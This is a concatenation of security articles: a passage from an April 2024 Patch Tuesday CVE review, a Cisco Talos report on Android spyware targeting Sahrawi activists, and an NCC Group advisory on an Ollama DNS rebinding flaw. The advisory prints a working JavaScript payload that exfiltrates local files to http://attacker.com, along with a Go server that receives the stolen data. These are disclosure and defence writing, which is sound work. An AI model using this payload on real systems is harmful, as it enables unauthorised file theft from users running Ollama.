CVE-2024-28938 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28941 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28943 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29043 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28906 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28908 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28909 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28910 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28911 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28912 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28913 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28914 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28915 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28926 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28927 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28939 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28940 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28942 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28944 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-28945 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29044 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29045 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-29046 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29047 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29048 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29982 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29983 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29984 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-29985 Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26251 Microsoft SharePoint Server Spoofing Vulnerability Important 6.8 No No Spoofing
CVE-2024-26254 Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-26210 Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26244 Microsoft WDAC OLE DB Provider for SQL Server Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26214 Microsoft WDAC SQL Server ODBC Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-20670 Outlook for Windows Spoofing Vulnerability Important 8.1 No No Spoofing
CVE-2024-20678 Remote Procedure Call Runtime Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-20669 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-20688 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB
CVE-2024-20689 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB
CVE-2024-26168 † Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB
CVE-2024-26171 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-26175 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB
CVE-2024-26180 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB
CVE-2024-26189 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB
CVE-2024-26194 † Secure Boot Security Feature Bypass Vulnerability Important 7.4 No No SFB
CVE-2024-26240 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB
CVE-2024-26250 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-28896 † Secure Boot Security Feature Bypass Vulnerability Important 7.5 No No SFB
CVE-2024-28897 † Secure Boot Security Feature Bypass Vulnerability Important 6.8 No No SFB
CVE-2024-28898 † Secure Boot Security Feature Bypass Vulnerability Important 6.3 No No SFB
CVE-2024-28903 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-28919 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-28920 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB
CVE-2024-28921 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-28922 † Secure Boot Security Feature Bypass Vulnerability Important 4.1 No No SFB
CVE-2024-28923 † Secure Boot Security Feature Bypass Vulnerability Important 6.4 No No SFB
CVE-2024-28924 † Secure Boot Security Feature Bypass Vulnerability Important 6.7 No No SFB
CVE-2024-28925 † Secure Boot Security Feature Bypass Vulnerability Important 8 No No SFB
CVE-2024-29061 † Secure Boot Security Feature Bypass Vulnerability Important 7.8 No No SFB
CVE-2024-29062 † Secure Boot Security Feature Bypass Vulnerability Important 7.1 No No SFB
CVE-2024-26241 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-21447 Windows Authentication Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-29056 Windows Authentication Elevation of Privilege Vulnerability Important 4.3 No No EoP
CVE-2024-29050 Windows Cryptographic Services Remote Code Execution Vulnerability Important 8.4 No No RCE
CVE-2024-26228 Windows Cryptographic Services Security Feature Bypass Vulnerability Important 7.8 No No SFB
CVE-2024-26229 Windows CSC Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26237 Windows Defender Credential Guard Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26226 Windows Distributed File System (DFS) Information Disclosure Vulnerability Important 6.5 No No Info
CVE-2024-29066 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26221 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26222 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26223 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26224 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26227 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26231 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26233 Windows DNS Server Remote Code Execution Vulnerability Important 7.2 No No RCE
CVE-2024-26172 Windows DWM Core Library Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-26216 Windows File Server Resource Management Service Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-29064 Windows Hyper-V Denial of Service Vulnerability Important 6.2 No No Info
CVE-2024-26183 Windows Kerberos Denial of Service Vulnerability Important 6.5 No No DoS
CVE-2024-26248 Windows Kerberos Elevation of Privilege Vulnerability Important 7.5 No No EoP
CVE-2024-20693 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26218 Windows Kernel Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26220 Windows Mobile Hotspot Information Disclosure Vulnerability Important 5 No No Info
CVE-2024-26211 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26207 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-26217 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-26255 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-28900 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-28901 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-28902 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-26252 Windows rndismp6.sys Remote Code Execution Vulnerability Important 6.8 No No RCE
CVE-2024-26253 Windows rndismp6.sys Remote Code Execution Vulnerability Important 6.8 No No RCE
CVE-2024-26179 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26200 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26205 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-26245 Windows SMB Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-29052 Windows Storage Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26230 Windows Telephony Server Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26239 Windows Telephony Server Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26242 Windows Telephony Server Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-26235 Windows Update Stack Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-26236 Windows Update Stack Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-26243 Windows USB Print Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-29992 Azure Identity Library for .NET Information Disclosure Vulnerability Moderate 5.5 No No Info
CVE-2024-20685 Azure Private 5G Core Denial of Service Vulnerability Moderate 5.9 No No DoS
CVE-2024-29049 Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability Moderate 4.1 No No Spoofing
CVE-2024-29981 Microsoft Edge (Chromium-based) Spoofing Vulnerability Low 4.3 No No Spoofing
CVE-2024-3156 * Chromium: CVE-2024-3156 Inappropriate implementation in V8 High N/A No No RCE
CVE-2024-3158 * Chromium: CVE-2024-3158 Use after free in Bookmarks High N/A No No RCE
CVE-2024-3159 * Chromium: CVE-2024-3159 Out of bounds memory access in V8 High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Moving on to the Critical-rated bugs, all impact Microsoft Defender for IoT. An authenticated attacker with file upload privileges could get arbitrary code execution through a path traversal vulnerability. They would need to upload specially crafted files to sensitive locations on the target. It’s not clear how likely this would be, but anything that targets your defensive tools should be taken seriously.

All told, there are almost 70 fixes for bugs that could lead to code execution in this release. The (somewhat) good news is that nearly half of these impact SQL server components. In these cases, an attacker would need to have an affected system connect to a specially crafted SQL database and perform a query. If you can socially engineer that, then you will get code execution. However, that does seem unlikely. More practically, I would concern myself with the DNS and DHCP code execution bugs in this release. I’ve already mentioned the DNS bugs. For the DHCP bugs, the attacker would need elevated privileges. This would be a good time to audit your DHCP server to see who has privileges and who should be removed. The fix for Azure Migrate is only network adjacent, but you’ll need to take extra steps to be fully protected. You need to the latest Azure Migrate Appliance's AutoUpdater, which ensures MSI installers downloaded from the Download Center have been authentically signed by Microsoft prior to installation. Check here for more details. There is an update for Excel to address an open-an-own bug, but you’re out of luck if you’re on macOS. Updates for Apple users are not available yet.

There’s a mountain of elevation of privilege (EoP) patches in this month’s release, and in most cases, exploitation requires an attacker to log on the an affected system then run their code. Again, this usually results in getting code to elevate to SYSTEM. The Azure EoPs are a little bit different and require some extra steps. The bug in Azure Arc-enabled Kubernetes could allow an attacker to gain access to sensitive information, such as Azure IoT Operations secrets and potentially other credentials or access tokens stored within the Kubernetes cluster. You’ll also need to update any affected Extensions that are used in your environment and ensure you update your Azure Arc Agent. The bug in Azure Content Gallery also needs extra actions to be protected. This bug has been mitigated by the latest change to the Azure Compute Gallery (ACG) image creation permission requirements, which means you’ll need to check the permissions and possibly update them. For information on how to update permissions, see here for details. For the Azure Monitor Agent EoP, you need to make sure you have Automatic Extension Upgrades enabled. If you don’t you can manually get the updates following these instructions. Finally, the bug in the Azure Kubernetes Service also needs some extra work. To be fully protected, you need to ensure you are running the latest version of “az confcom” and Kata Image. If you don’t have “az conform” installed, you can get the latest version by running the command “az extension add -n conform”. See the bulletin for full details.

Moving on to the security feature bypass (SFB) bugs, how in the world are there 23 different SFB patches for Secure Boot? As if that isn’t enough, you’ll need to take additional steps to be protected. The patch fixes the bugs, but the protections aren’t enabled by default. You’ll need to check out this KB article and follow the instructions listed there. With 23 bugs and manual actions needed to address them, I don’t think we should call it “secure” boot anymore. Other SFB bugs include one that could bypass RSA signature verification and a bug in BitLocker that could also bypass secure boot. At least that one just requires a patch and no extra steps.

There are more than a dozen information disclosure bugs. Fortunately, most only result in info leaks consisting of unspecified memory contents. The bug in Azure AI Search could allow an attacker to obtain sensitive API Keys. While this bug has been mitigated by a recent update to Azure AI Search's backend infrastructure, you’ll need to manually rotate specific credentials that have been notified through Azure Service Health alerts. The bug in Azure Identity Library for .NET could divulge data inside the targeted website like IDs, tokens, nonces, and other sensitive information. At least there are no additional steps beyond the patch for this one. Finally, the bug in Windows DFS could disclose the ever-descriptive “sensitive information”.

The April release is rounded out by a handful of spoofing and denial-of-service (DoS) bugs. Microsoft doesn’t provide a lot of useful information here, but if you need to focus on something, the DoS bugs in the DHCP service are where I’d start. Shutting down DHCP for any time in an enterprise will likely lead to a “no fun at all” day.

Finally, Microsoft has updated ADV99001 with the latest servicing stack updates. Be sure to check them out.

Looking Ahead

The next Patch Tuesday of 2024 will be on May 14, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Starry Addax targets human rights defenders in North Africa with new malware

  • Cisco Talos is disclosing a new threat actor we deemed “Starry Addax” targeting mostly human rights activists associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware. 
  • Starry Addax conducts phishing attacks tricking their targets into installing malicious Android applications we’re calling “FlexStarling.” 
  • For Windows-based targets, Starry Addax will serve credential-harvesting pages masquerading as login pages from popular media websites. 
Starry Addax targets human rights defenders in North Africa with new malware

Talos would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation. 

Starry Addax has a special interest in Western Sahara

The malicious mobile application (APK), “FlexStarling,” analyzed by Talos recently masquerades as a variant of the Sahara Press Service (SPSRASD) App. The Sahara Press Service is a media agency associated with the Sahrawi Arab Democratic Republic. The malware will serve content in the Spanish language from the SPSRASD website to look legitimate to the victim. However, in actuality, FlexStarling is a highly versatile malware capable of deploying additional malware components and stealing information from the infected devices. 

Starry Addax targets human rights defenders in North Africa with new malware
 Splash screen for the malicious application.

Starry Addax’s infrastructure can be used to target Windows- and Android-based users. This campaign's infection chain begins with a spear-phishing email sent to targets, consisting of individuals of interest to the attackers, especially human rights activists in Morocco and the Western Sahara region. The email contains content that requests the target to install the Sahrawi News Agency’s Mobile App or include a topical theme related to the Western Sahara.  

Some examples of the subject lines of the phishing emails consist of: 

Subject (Arabic) 

Translated Subject 

طلب تثبيت التطبيق على هواتف متابعي وكالة الأنباء الصحراوية 

Request to install the application on the phones of Sahrawi News Agency followers 

الوفد برلماني الأوروبي يدلي بتصريحات 

The European Parliament delegation makes statements 

الوفد برلماني يدلي بتصريحات 

A parliamentary delegation makes statements 

عاجل وبالفيديو ونقلاً عن جريدة إلبايس 

Urgent, video, and quoted from El Pais newspaper 

The email originating from an attacker-owned domain, ondroid[.]site, consists of a shortened link to an attacker-controlled website and domain. Depending on the requestor’s operating system, the website will either serve the FlexStarling APK for Android devices or redirect the victim to a social media login page to harvest their credentials. The links observed by Talos so far are:  

Short link 

Redirects to 

bit[.]ly/48wdj1m 

www[.]ondroid[.]store/aL2mohh1 

bit[.]ly/48E4W3N 

www[.]ondroid[.]store/ties5shizooQu1ei/ 

Starry Addax likely to escalate momentum 

Campaigns like this that target high-value individuals usually intend to sit quietly on the device for an extended period. All components from the malware to the operating infrastructure seem to be bespoke/custom-made for this specific campaign indicating a heavy focus on stealth and conducting activities under the radar. The use of FlexStarling with a Firebase-based C2 instead of commodity malware or commercially available spyware indicates the threat actor is making a conscious effort to evade detections and operate without being detected. 

The timelines connected to various artifacts used in the attacks indicate that this campaign is just starting and may be in its nascent stages with more infrastructure and Starry Addax working on additional malware variants. 

Starry Addax targets human rights defenders in North Africa with new malware

FlexStarling – A highly capable implant 

The FlexStarling malware app requests a plethora of permissions from the Android OS to extract valuable information from the infected mobile device. The following list contains the permissions acquired by FlexStarling via its AndroidManifest[.]xml: 

Some of these permissions are dynamically requested at runtime: READ_CALL_LOG, READ_EXTERNAL_STORAGE, READ_SMS, READ_CONTACTS, WRITE_EXTERNAL_STORAGE, INTERNET, ACCESS_NETWORK_STATE, RECORD_AUDIO, READ_PHONE_STATE. 

Anti-emulation checks 

When the implant runs, it checks the BUILD information for keywords or phrases that indicate that it is running on an emulator or analysis tool. The implant checks for the following keywords: 

  • BUILD[MANUFACTURER] does not contain: “Genymotion”. 
  • BUILD[MODEL] does not contain any of: “google_sdk”, “droid4x”, “Emulator”, "Android SDK built for x86" 
  • BUILD[HARDWARE] does not contains any of: “goldfish”, “vbox86”, “nox”. 
  • BUILD[FingerPrint] does not start with “generic”. 
  • BUILD[Product] does not consist of any of: “sdk”, “google_sdk”, “sdk_x86”, “vbox86p”, “nox”. 
  • BUILD[Board] does not contain: “nox”. 
  • BUILD[Brand] or Device does not start with “generic”.  

The implant also checks for the presence of the following emulation/virtualization-related files in the filesystem: 

  • /dev/socket/genyd 
  • /dev/socket/baseband_genyd 
  • /dev/socket/qemud 
  • /dev/qemu_pipe 
  • ueventd.android_x86.rc 
  • X86.prop 
  • ueventd.ttVM_x86.rc 
  • init.ttVM_x86.rc 
  • fstab.ttVM_x86 
  • fstab.vbox86 
  • init.vbox86.rc 
  • ueventd.vbox86.rc 
  • fstab.andy 
  • ueventd.andy.rc 
  • fstab.nox 
  • init.nox.rc 
  • Ueventd.nox.rc 

If none of the keywords or files are found or all checks are passed, the malicious app tries to gain permissions for managing external storage areas (shared storage space) on the device using the permission “MANAGE_EXTERNAL_STORAGE”.  The actor wants to gain the ability to read, write, modify, delete and manage files on external storage locations.  

Stealing information and executing arbitrary code 

The malware obtains command codes and accompanying information from the C2 server. It then generates the MD5 hash string of the command code and compares its list of hardcoded hashes. The corresponding activity is carried out by the implant once a match is found. 

The various commands supported by the sample are: 

Command code MD5 hash 

Decode command code 

Intent 

801ab24683a4a8c433c6eb40c48bcd9d 

Download 

Download a file specified by a URL to the Downloads directory. 

e8606d021da140a92c7eba8d9b8af84f 

unknown 

Copy files from the download's directory to the application package directory 

725888549d44eb5a3a676c018df55943 

unknown 

Decrypt a dex file located in the application package directory and reflectively load it. 

3a884d7285b2caa1cb2b60f887571d6c 

unknown 

Cleanup directories – remove all files: 

  • Cache directory. 

  • Application package directory (including “/oat/”). 

  • External Cache Directory. 

f2a6c498fb90ee345d997f888fce3b18 

Delete 

Delete a specified filepath. 

3e679cff5b3a6f6f8f32aead541a0a12 

Drop 

Upload a local file to the attacker’s dropbox folders using the Dropbox API. 

The ACCESS TOKEN, local filepath and remote upload path is specified by the C2. 

fb84708d32d00fca5d352e460776584c 

DECRYPT 

AES Decrypt a file from the application package directory using the secret key and IV specified and write it to a file named “.EXEC.dex” 

0ba4439ee9a46d9d9f14c60f88f45f87 

check 

Check if a file inside the application package directory exists. 

These commands are supported by accompanying information and consist of the following variables being sent across by the C2: 

DURL: Indicates the download URL used by the “Download” command above. 

APPNAME: Indicates the filename to use for the destination file during the “Download” command. 

DEX: Contains the source file name to be used during the Decrypt (and reflectively load) commands. 

ky1: Indicates a value to be used in the context of specific command codes: 

  • Delete = File to be deleted. 
  • Drop = File to be read and uploaded to Dropbox. 
  • DECRYPT = Secret key used for AES decryption. 
  • Check = Filename to be whose presence is to be checked in the application package directory. 

 ky2: Indicates a value to be used in the context of specific command codes: 

  • Drop = Remote file location where the local file needs to be uploaded on Dropbox. 
  • DECRYPT = IV used for AES decryption. 

 ky3: Indicates a value to be used in the context of specific command codes: 

  • Drop = Dropbox ACCESS TOKEN value to be used during file upload. 
  • DECRYPT = IV used for AES decryption. 

 fl: Filename used during the DEX reflective load process.  

ky4: Used as a parameter during reflective loading of the DEX file. 

ky5: Secret key used for AES decryption as part of the implant’s DEX decrypt and reflective load. 

ky6: IV used for AES decryption as part of the implant’s DEX decrypt and reflective load. 

ky7: Contains the source file name to be used during the AES decryption as part of the implant’s DEX decrypt and reflective load. 

Coverage 

Ways our customers can detect and block this threat are listed below. 

Starry Addax targets human rights defenders in North Africa with new malware

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

 Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

IOCs 

IOCs for this research can also be found at our GitHub repository here

Hashes 

f7d9c4c7da6082f1498d41958b54d7aeffd0c674aab26db93309e88ca17c826c 

ec2f2944f29b19ffd7a1bb80ec3a98889ddf1c097130db6f30ad28c8bf9501b3 

Network IOCs 

hxxps[://]runningapplications-b7dae-default-rtdb[.]firebaseio[.]com 

ondroid[.]site 

ondroid[.]store 

bit[.]ly/48wdj1m 

www[.]ondroid[.]store/aL2mohh1 

bit[.]ly/48E4W3N 

www[.]ondroid[.]store/ties5shizooQu1ei/ 

Technical Advisory – Ollama DNS Rebinding Attack (CVE-2024-28224)

Vendor: Ollama
Vendor URL: https://ollama.com/
Versions affected: Versions prior to v0.1.29
Systems Affected: All Ollama supported platforms
Author: Gérald Doussot
Advisory URL / CVE Identifier: CVE-2024-28224
Risk: High, Data Exfiltration

Summary:

Ollama is an open-source system for running and managing large language models (LLMs).

NCC Group identified a DNS rebinding vulnerability in Ollama that permits attackers to access its API without authorization, and perform various malicious activities, such as exfiltrating sensitive file data from vulnerable systems.

Ollama fixed this issue in release v0.1.29. Ollama users should update to this version, or later.

Impact:

The Ollama DNS rebinding vulnerability grants attackers full access to the Ollama API remotely, even if the vulnerable system is not configured to expose its API publicly. Access to the API permits attackers to exfiltrate file data present on the system running Ollama. Attackers can perform other unauthorized activities such as chatting with LLM models, deleting these models, and to cause a denial-of-service attack via resource exhaustion. DNS rebinding can happen in as little as 3 seconds once connected to a malicious web server.

Details:

Ollama is vulnerable to DNS rebinding attacks, which can be used to bypass the browser same-origin policy (SOP). Attackers can interact with the Ollama service, and invoke its API on a user desktop machine, or server.

Attackers must direct Ollama users running Ollama on their computers to connect to a malicious web server, via a regular, or headless web browser (for instance, in the context of a server-side web scraping application). The malicious web server performs the DNS rebinding attack to force the web browsers to interact with the vulnerable Ollama instance, and API, on the attackers’ behalf.

The Ollama API permits to manage and run local models. Several of its APIs have access to the file system and can pull/retrieve data from/to remote repositories. Once the DNS rebinding attack has been successful, attackers can sequence these APIs to read arbitrary file data accessible by the process under which Ollama runs, and exfiltrate this data to attacker-controlled systems.

NCC Group successfully implemented a proof-of-concept data exfiltration attack using the following steps:

Deploy NCC Group’s Singularity of Origin DNS rebinding application, which includes the components to configure a “malicious host”, and to perform DNS rebinding attacks.

Singularity requires the development of attack payloads to exploit specific applications such as Ollama, once DNS rebinding has been achieved. A proof-of-concept payload, written in JavaScript is provided below. Variable EXFILTRATION_URL, must be configured to point to an attacker-owned domain, such as attacker.com, to send the exfiltrated data, from the vulnerable host.

/**
This is a sample payload to exfiltrate files from hosts running Ollama
**/

const OllamaLLama2ExfilData = () => {

// Invoked after DNS rebinding has been performed
function attack(headers, cookie, body) {
if (headers !== null) {
console.log(`Origin: ${window.location} headers: ${httpHeaderstoText(headers)}`);
};
if (cookie !== null) {
console.log(`Origin: ${window.location} headers: ${cookie}`);
};
if (body !== null) {
console.log(`Origin: ${window.location} body:\n${body}`);
};

let EXFILTRATION_URL = "http://attacker.com/myrepo/mymaliciousmodel";
sooFetch('/api/create', {
method: 'POST',
mode: "no-cors",
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
},
body: `{ "name": "${EXFILTRATION_URL}", "modelfile": "FROM llama2\\nSYSTEM You are a malicious model file\\nADAPTER /tmp/test.txt"}`
}).then(responseOKOrFail("Could not invoke /api/create"))
.then(function (d) { //data
console.log(d)
return sooFetch('/api/push', {
method: 'POST',
mode: "no-cors",
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
},
body: `{ "name": "${EXFILTRATION_URL}", "insecure": true}`
});
}).then(responseOKOrFail("Could not invoke /api/push"))
.then(function (d) { //data
console.log(d);
});
}

// Invoked to determine whether the rebinded service
// is the one targeted by this payload. Must return true or false.
async function isService(headers, cookie, body) {
if (body.includes("Ollama is running") === true) {
return true;
} else {
return false;
}
}

return {
attack,
isService
}
}

// Registry value and manager-config.json value must match
Registry["Ollama Llama2 Exfiltrate Data"] = OllamaLLama2ExfilData();

At a high-level, the payload invokes two Ollama APIs to exfiltrate data, as explained below.

Invoke the “Create a Model” API

The body of the request contains the following data:

 `{ "name": "${EXFILTRATION_URL}", "modelfile": "FROM llama2\\nSYSTEM You are a malicious model file\\nADAPTER /tmp/test.txt"}`

This request triggers the creation of a model in Ollama. Of note, the model is configured to load data from a file via the ADAPTER instruction, in parameter modelfile. This is the file we are going to exfiltrate, and in our example, an existing text file accessible via pathname /tmp/test.txt on the host running Ollama.

(As a side note the FROM instruction also supports filepath values, but was found to be unsuitable to exfiltrate data, as the FROM file content is validated by Ollama. This is not the case for the ADAPTER parameter. Note further that one can cause a denial-of-service attack via the FROM instruction, when specifying values such as /dev/random, remotely via DNS rebinding.)

The model name typically consists of a repository, and model name in the form repository/modelname. We found that we can specify a URL instead e.g. http://attacker.com/myrepo/mymaliciousmodel. This feature is seemingly present to permit sharing user developed models to other registries than the default https://registry.ollama.ai/ registry. Specifying “attacker.com” allows attackers to exfiltrate data to another (attacker-controlled) registry.

Upon completion of the call to the “Create a Model” API request, Ollama will have gathered a number of artifacts composing the newly created user model, including Large Language Model data, license data, etc., and our file to exfiltrate, all of them addressable by their SHA256 contents.

Invoke the “Push a Model” API

The body of the request contains the following data:

`{ "name": "${EXFILTRATION_URL}", "insecure": true}`

The name parameter remains the same as before. The insecure parameter is set to true to avoid having to configure an exfiltration host that is secured using TLS. This request will upload all artifacts of the created model, including model data, and the file to exfiltrate to the attacker host.

Exfiltration to Rogue LLM Registry

Ollama uses a different API to communicate with the registry (and in our case, the data exfiltration host). We wrote a proof-of-concept web server in the Go language, that implements enough of the registry API to receive the exfiltrated data and dump it in the terminal. It also lies to the Ollama client process in order to save bandwidth, and make the attack more efficient, by stating that it already has the LLM data (several GBs), based on known hashes of their contents.

package main

import (
    "fmt"
    "io"
    "log"
    "net/http"
    "net/http/httputil"
    "strings"
)

func main() {

    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        
        reqDump, _ := httputil.DumpRequest(r, true)
        reqDumps := string(reqDump)
        fmt.Printf("REQUEST:\n%s", reqDumps)

        host := r.Host

        switch r.Method {
        case "HEAD":
            if strings.Contains(reqDumps, "c70fa74a8e81c3bd041cc2c30152fe6e251fdc915a3792147147a5c06bc4b309") ||
                strings.Contains(reqDumps, "8934d96d3f08982e95922b2b7a2c626a1fe873d7c3b06e8e56d7bc0a1fef9246") {
                w.WriteHeader(http.StatusOK)
                return
            }
            w.WriteHeader(http.StatusNotFound)
            return
        case "POST", "PATCH":
            w.Header().Set("Docker-Upload-Location", fmt.Sprintf("http://%s/v2/repo/mod/blobs/uploads/whatever", host))
            w.Header().Set("Location", fmt.Sprintf("http://%s/v2/repo/mod/blobs/uploads/whatever", host))
            w.WriteHeader(http.StatusAccepted)
        default:
        
        }

        b, err := io.ReadAll(r.Body)
        if err != nil {
            panic(err)
        }

        fmt.Printf("Data: %s", b)
    })

    log.Fatal(http.ListenAndServe(":80", nil))

}

Recommendation:

Users should update to at least version v0.1.29 of Ollama, which fixed the DNS rebinding vulnerability.

For reference, NCC Group provided the following recommendations to Ollama to address the DNS rebinding vulnerability:

Use TLS on all services including localhost, if possible.

For services listening on any network interface, authentication should be required to prevent unauthorized access.

